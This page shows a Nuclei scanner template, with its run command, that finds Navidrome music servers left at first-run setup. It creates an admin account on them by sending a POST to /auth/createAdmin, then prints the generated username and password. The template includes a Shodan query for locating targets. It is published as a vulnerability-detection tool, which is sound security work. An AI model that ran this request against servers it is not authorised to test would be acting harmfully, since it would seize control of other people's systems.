Skip to content

Navidrome Admin User Creation

ID: navidrome-admin-install

Severity: critical

Author: DhiyaneshDK

Tags: navidrome,installer,misconfig,intrusive

id: navidrome-admin-install
info:
name: Navidrome Admin User Creation
author: DhiyaneshDK
severity: critical
metadata:
verified: true
max-request: 1
shodan-query: html:"content="Navidrome""
tags: navidrome,installer,misconfig,intrusive
variables:
username: "admin"
password: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
POST /auth/createAdmin HTTP/1.1
Host: {{Hostname}}
content-type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/app/
{"username":"admin","password":"{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"isAdmin":true'
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
# digest: 4b0a00483046022100959369361ba8769fb4a1166c63da9e9be8d2c1501c27587466098719c3369373022100f053be57d0debef6c83739ca76c05fd66dcd55707b506feb4b48a46fbf2e84c6:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/misconfiguration/installer/navidrome-admin-install.yaml"

View on Github